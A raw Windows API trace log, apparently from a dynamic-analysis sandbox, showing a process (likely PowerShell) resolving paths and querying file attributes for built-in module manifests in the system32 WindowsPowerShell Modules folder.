	[0049.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d
	[0049.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa)) returned 1
	[0049.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53
	[0049.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b)) returned 1
	[0049.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63
	[0049.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875)) returned 1
	[0049.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47
	[0049.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432)) returned 1
	[0049.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45
	[0049.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c)) returned 1
	[0049.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45
	[0049.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289)) returned 1
	[0049.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f
	[0049.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1)) returned 1
	[0049.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53
	[0049.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1
	[0049.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49
	[0049.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862)) returned 1
	[0049.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b
	[0049.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1
	[0049.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61
	[0049.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e)) returned 1
	[0049.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b
	[0049.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6d)) returned 1
	[0049.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d
	[0049.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209484fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x209484fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x209484fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34a)) returned 1
	[0049.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f
	[0049.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x764)) returned 1
	[0049.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b
	[0049.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159bf51c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x159bf51c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x159bf51c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x329)) returned 1
	[0049.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57
	[0049.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2131e00c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2131e00c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2131e00c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20ec)) returned 1
	[0049.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f
	[0049.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa88f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5fa88f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5fa88f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198)) returned 1
	[0049.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53
	[0049.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.084] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f3c72, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a52)) returned 1
	[0049.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53
	[0049.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.085] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cda18, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e)) returned 1
	[0049.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55
	[0049.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.085] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01a5ef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f01a5ef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f01a5ef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3be)) returned 1
	[0049.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d
	[0049.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
	[0049.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de70 | out: lpFileInformation=0x184c18de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a75f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x63a75f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x63a75f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1
	[0049.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0049.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x184c18d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b
	[0049.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd90) returned 1
